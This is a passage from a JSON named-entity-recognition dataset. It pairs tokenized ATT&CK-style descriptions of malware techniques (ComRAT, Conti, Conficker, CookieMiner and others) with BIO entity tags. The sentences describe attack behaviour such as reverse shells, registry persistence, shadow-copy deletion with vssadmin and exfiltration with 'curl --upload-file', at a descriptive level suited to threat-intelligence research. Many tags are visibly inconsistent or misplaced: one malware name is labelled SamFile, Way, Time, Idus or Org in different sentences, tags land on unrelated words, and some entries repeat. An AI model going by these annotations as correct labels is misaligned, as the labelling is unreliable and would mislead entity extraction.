"O", - "O" - ] - }, - { - "tokens": [ - "CoinTicker", - "initially", - "downloads", - "a", - "hidden", - "encoded", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CoinTicker", - "executes", - "a", - "Python", - "script", - "to", - "download", - "its", - "second", - "stage." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CoinTicker", - "executes", - "a", - "bash", - "script", - "to", - "establish", - "a", - "reverse", - "shell." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CoinTicker", - "executes", - "a", - "bash", - "script", - "to", - "establish", - "a", - "reverse", - "shell." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "can", - "use", - "SSL/TLS", - "encryption", - "for", - "its", - "HTTP-based", - "C2", - "channel.", - "ComRAT", - "has", - "used", - "public", - "key", - "cryptography", - "with", - "RSA", - "and", - "AES", - "encrypted", - "email", - "attachments", - "for", - "its", - "Gmail", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "the", - "ability", - "to", - "use", - "the", - "Gmail", - "web", - "UI", - "to", - "receive", - "commands", - "and", - "exfiltrate", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "used", - "encryption", - "and", - "base64", - "to", - "obfuscate", - "its", - "orchestrator", - "code", - "in", - "the", - "Registry.", - "ComRAT", - "has", - "also", - "used", - "encoded", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "ComRAT", - "samples", - "have", - "been", - "seen", - "which", - "hijack", - "COM", - "objects", - "for", - "persistence", - "by", - "replacing", - "the", - "path", - "to", - "shell32.dll", - "in", - "registry", - "location", - "<code>HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32</code>." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Features", - "I-Features", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "used", - "unique", - "per", - "machine", - "passwords", - "to", - "decrypt", - "the", - "orchestrator", - "payload", - "and", - "a", - "hardcoded", - "XOR", - "key", - "to", - "decrypt", - "its", - "communications", - "module.", - "ComRAT", - "has", - "also", - "used", - "a", - "unique", - "password", - "to", - "decrypt", - "the", - "file", - "used", - "for", - "its", - "hidden", - "file", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "injected", - "its", - "orchestrator", - "DLL", - "into", - "explorer.exe.", - "ComRAT", - "has", - "also", - "injected", - "its", - "communications", - "module", - "into", - "the", - "victim's", - "default", - "browser", - "to", - "make", - "C2", - "connections", - "appear", - "less", - "suspicious", - "as", - "all", - "network", - "connections", - "will", - "be", - "initiated", - "by", - "the", - "browser", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "embedded", - "a", - "XOR", - "encrypted", - "communications", - "module", - "inside", - "the", - "orchestrator", - "module." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "stored", - "encrypted", - "orchestrator", - "code", - "and", - "payloads", - "in", - "the", - "Registry." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "used", - "a", - "portable", - "FAT16", - "partition", - "image", - "placed", - "in", - "%TEMP%", - "as", - "a", - "hidden", - "file", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "can", - "use", - "email", - "attachments", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "used", - "a", - "task", - "name", - "associated", - "with", - "Windows", - "SQM", - "Consolidator." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam", - "B-SecTeam" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "modified", - "Registry", - "values", - "to", - "store", - "encrypted", - "orchestrator", - "code", - "and", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "can", - "load", - "a", - "PE", - "file", - "from", - "memory", - "or", - "the", - "file", - "system", - "and", - "execute", - "it", - "with", - "<code>CreateProcessW</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "encrypted", - "its", - "virtual", - "file", - "system", - "using", - "AES-256", - "in", - "XTS", - "mode." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "used", - "PowerShell", - "to", - "load", - "itself", - "every", - "time", - "a", - "user", - "logs", - "in", - "to", - "the", - "system.", - "ComRAT", - "can", - "execute", - "PowerShell", - "scripts", - "loaded", - "into", - "memory", - "or", - "from", - "the", - "file", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "can", - "check", - "the", - "default", - "browser", - "by", - "querying", - "<code>HKCR\\http\\shell\\open\\command</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "used", - "a", - "scheduled", - "task", - "to", - "launch", - "its", - "PowerShell", - "loader." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "been", - "programmed", - "to", - "sleep", - "outside", - "local", - "business", - "hours", - "(9", - "to", - "5,", - "Monday", - "to", - "Friday)." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "can", - "check", - "the", - "victim's", - "default", - "browser", - "to", - "determine", - "which", - "process", - "to", - "inject", - "its", - "communications", - "module", - "into." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "checked", - "the", - "victim", - "system's", - "date", - "and", - "time", - "to", - "perform", - "tasks", - "during", - "business", - "hours", - "(9", - "to", - "5,", - "Monday", - "to", - "Friday)." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "used", - "HTTP", - "requests", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ComRAT", - "has", - "used", - "<code>cmd.exe</code>", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "executes", - "a", - "batch", - "script", - "to", - "store", - "discovery", - "information", - "in", - "%TEMP%\\info.dat", - "and", - "then", - "uploads", - "the", - "temporarily", - "file", - "to", - "the", - "remote", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "uses", - "blogs", - "and", - "third-party", - "sites", - "(GitHub,", - "tumbler,", - "and", - "BlogSpot)", - "to", - "avoid", - "DNS-based", - "blocking", - "of", - "their", - "communication", - "to", - "the", - "command", - "and", - "control", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "appends", - "a", - "total", - "of", - "64MB", - "of", - "garbage", - "data", - "to", - "a", - "file", - "to", - "deter", - "any", - "security", - "products", - "in", - "place", - "that", - "may", - "be", - "scanning", - "files", - "on", - "disk." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "uses", - "the", - "<code>net", - "user</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "uses", - "RC4", - "and", - "Base64", - "to", - "obfuscate", - "strings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "uses", - "the", - "<code>tasklist</code>", - "to", - "view", - "running", - "processes", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "achieves", - "persistence", - "by", - "adding", - "a", - "shortcut", - "of", - "itself", - "to", - "the", - "startup", - "path", - "in", - "the", - "Registry." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "runs", - "the", - "<code>net", - "view</code>", - "command" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "uses", - "Rundll32", - "to", - "load", - "a", - "malicious", - "DLL." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "attempts", - "to", - "detect", - "several", - "anti-virus", - "products." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "establishes", - "persistence", - "via", - "a", - ".lnk", - "file", - "in", - "the", - "victim’s", - "startup", - "path." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "encrypts", - "command", - "and", - "control", - "communications", - "with", - "RC4." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "collects", - "the", - "hostname", - "of", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "uses", - "<code>ipconfig", - "/all</code>", - "and", - "<code>route", - "PRINT</code>", - "to", - "identify", - "network", - "adapter", - "and", - "interface", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "executes", - "the", - "<code>netstat", - "-ano</code>", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "runs", - "the", - "command:", - "<code>net", - "start", - ">>", - "%TEMP%\\info.dat</code>", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "executes", - "VBS", - "scripts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "uses", - "HTTP", - "for", - "C2", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Comnie", - "executes", - "BAT", - "scripts." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Conficker", - "terminates", - "various", - "services", - "related", - "to", - "system", - "security", - "and", - "Windows." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conficker", - "has", - "used", - "a", - "DGA", - "that", - "seeds", - "with", - "the", - "current", - "UTC", - "victim", - "system", - "date", - "to", - "generate", - "domains." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conficker", - "exploited", - "the", - "MS08-067", - "Windows", - "vulnerability", - "for", - "remote", - "code", - "execution", - "through", - "a", - "crafted", - "RPC", - "request." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "B-Exp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conficker", - "downloads", - "an", - "HTTP", - "server", - "to", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conficker", - "resets", - "system", - "restore", - "points", - "and", - "deletes", - "backup", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Conficker", - "adds", - "keys", - "to", - "the", - "Registry", - "at", - "<code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services</code>", - "and", - "various", - "other", - "Registry", - "locations." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conficker", - "scans", - "for", - "other", - "machines", - "to", - "infect." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conficker", - "has", - "obfuscated", - "its", - "code", - "to", - "prevent", - "its", - "removal", - "from", - "host", - "machines." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conficker", - "adds", - "Registry", - "Run", - "keys", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conficker", - "variants", - "used", - "the", - "Windows", - "AUTORUN", - "feature", - "to", - "spread", - "through", - "USB", - "propagation." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Conficker", - "variants", - "spread", - "through", - "NetBIOS", - "share", - "propagation." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conficker", - "uses", - "the", - "current", - "UTC", - "victim", - "system", - "date", - "for", - "domain", - "generation", - "and", - "connects", - "to", - "time", - "servers", - "to", - "determine", - "the", - "current", - "date." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conficker", - "copies", - "itself", - "into", - "the", - "<code>%systemroot%\\system32</code>", - "directory", - "and", - "registers", - "as", - "a", - "service." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ConnectWise", - "can", - "be", - "used", - "to", - "execute", - "PowerShell", - "commands", - "on", - "target", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ConnectWise", - "can", - "take", - "screenshots", - "on", - "remote", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ConnectWise", - "can", - "record", - "video", - "on", - "remote", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conti", - "can", - "use", - "<code>CreateIoCompletionPort()</code>,", - "<code>PostQueuedCompletionStatus()</code>,", - "and", - "<code>GetQueuedCompletionPort()</code>", - "to", - "rapidly", - "encrypt", - "files,", - "excluding", - "those", - "with", - "the", - "extensions", - "of", - ".exe,", - ".dll,", - "and", - ".lnk.", - "It", - "has", - "used", - "a", - "different", - "AES-256", - "encryption", - "key", - "per", - "file", - "with", - "a", - "bundled", - "RAS-4096", - "public", - "encryption", - "key", - "that", - "is", - "unique", - "for", - "each", - "victim.", - "Conti", - "can", - "use", - "“Windows", - "Restart", - "Manager”", - "to", - "ensure", - "files", - "are", - "unlocked", - "and", - "open", - "for", - "encryption." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conti", - "has", - "decrypted", - "its", - "payload", - "using", - "a", - "hardcoded", - "AES-256", - "key." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Conti", - "has", - "loaded", - "an", - "encrypted", - "DLL", - "into", - "memory", - "and", - "then", - "executes", - "it." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conti", - "can", - "discover", - "files", - "on", - "a", - "local", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conti", - "can", - "delete", - "Windows", - "Volume", - "Shadow", - "Copies", - "using", - "<code>vssadmin</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conti", - "has", - "used", - "API", - "calls", - "during", - "execution." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conti", - "can", - "enumerate", - "remote", - "open", - "SMB", - "network", - "shares", - "using", - "<code>NetShareEnum()</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conti", - "can", - "use", - "compiler-based", - "obfuscation", - "for", - "its", - "code,", - "encrypt", - "DLLs,", - "and", - "hide", - "Windows", - "API", - "calls." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Tool", - "B-Tool", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conti", - "can", - "enumerate", - "through", - "all", - "open", - "processes", - "to", - "search", - "for", - "any", - "that", - "have", - "the", - "string", - "“sql”", - "in", - "their", - "process", - "name." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conti", - "has", - "the", - "ability", - "to", - "discover", - "hosts", - "on", - "a", - "target", - "network." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conti", - "can", - "spread", - "via", - "SMB", - "and", - "encrypts", - "files", - "on", - "different", - "hosts,", - "potentially", - "compromising", - "an", - "entire", - "network." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conti", - "can", - "stop", - "up", - "to", - "146", - "Windows", - "services", - "related", - "to", - "security,", - "backup,", - "database,", - "and", - "email", - "solutions", - "through", - "the", - "use", - "of", - "<code>net", - "stop</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "B-Idus", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conti", - "can", - "retrieve", - "the", - "ARP", - "cache", - "from", - "the", - "local", - "system", - "by", - "using", - "the", - "<code>GetIpNetTable()</code>", - "API", - "call", - "and", - "check", - "to", - "ensure", - "IP", - "addresses", - "it", - "connects", - "to", - "are", - "for", - "local,", - "non-Internet,", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conti", - "can", - "enumerate", - "routine", - "network", - "connections", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Conti", - "can", - "spread", - "itself", - "by", - "infecting", - "other", - "remote", - "machines", - "via", - "network", - "shared", - "drives." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Conti", - "can", - "utilize", - "command", - "line", - "options", - "to", - "allow", - "an", - "attacker", - "control", - "over", - "how", - "it", - "scans", - "and", - "encrypts", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "CookieMiner", - "has", - "used", - "base64", - "encoding", - "to", - "obfuscate", - "scripts", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CookieMiner", - "can", - "steal", - "saved", - "usernames", - "and", - "passwords", - "in", - "Chrome", - "as", - "well", - "as", - "credit", - "card", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "CookieMiner", - "has", - "retrieved", - "iPhone", - "text", - "messages", - "from", - "iTunes", - "phone", - "backup", - "files." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CookieMiner", - "has", - "used", - "Google", - "Chrome's", - "decryption", - "and", - "extraction", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CookieMiner", - "has", - "checked", - "for", - "the", - "presence", - "of", - "\"Little", - "Snitch\",", - "macOS", - "network", - "monitoring", - "and", - "application", - "firewall", - "software,", - "stopping", - "and", - "exiting", - "if", - "it", - "is", - "found." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CookieMiner", - "has", - "used", - "the", - "<code>curl", - "--upload-file</code>", - "command", - "to", - "exfiltrate", - "data", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "CookieMiner", - "has", - "looked", - "for", - "files", - "in", - "the", - "user's", - "home", - "directory", - "with", - "\"wallet\"", - "in", - "their", - "name", - "using", - "<code>find</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CookieMiner", - "can", - "download", - "additional", - "scripts", - "from", - "a", - "web", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CookieMiner", - "has", - "installed", - "multiple", - "new", - "Launch", - "Agents", - "in", - "order", - "to", - "maintain", - "persistence", - "for", - "cryptocurrency", - "mining", - "software." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CookieMiner", - "has", - "used", - "python", - "scripts", - "on", - "the", - "user’s", - "system,", - "as", - "well", - "as", - "the", - "Python", - "variant", - "of", - "the", - "Empire", - "agent,", - "EmPyre." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "CookieMiner", - "has", - "loaded", - "coinmining", - "software", - "onto", - "systems", - "to", - "mine", - "for", - "Koto", - "cryptocurrency." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "CookieMiner", - "has", - "checked", - "for", - "the", - "presence", - "of", - "\"Little", - "Snitch\",", - "macOS", - "network", - "monitoring", - "and", - "application", - "firewall", - "software,", - "stopping", - "and", - "exiting", - "if", - "it", - "is", - "found." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - 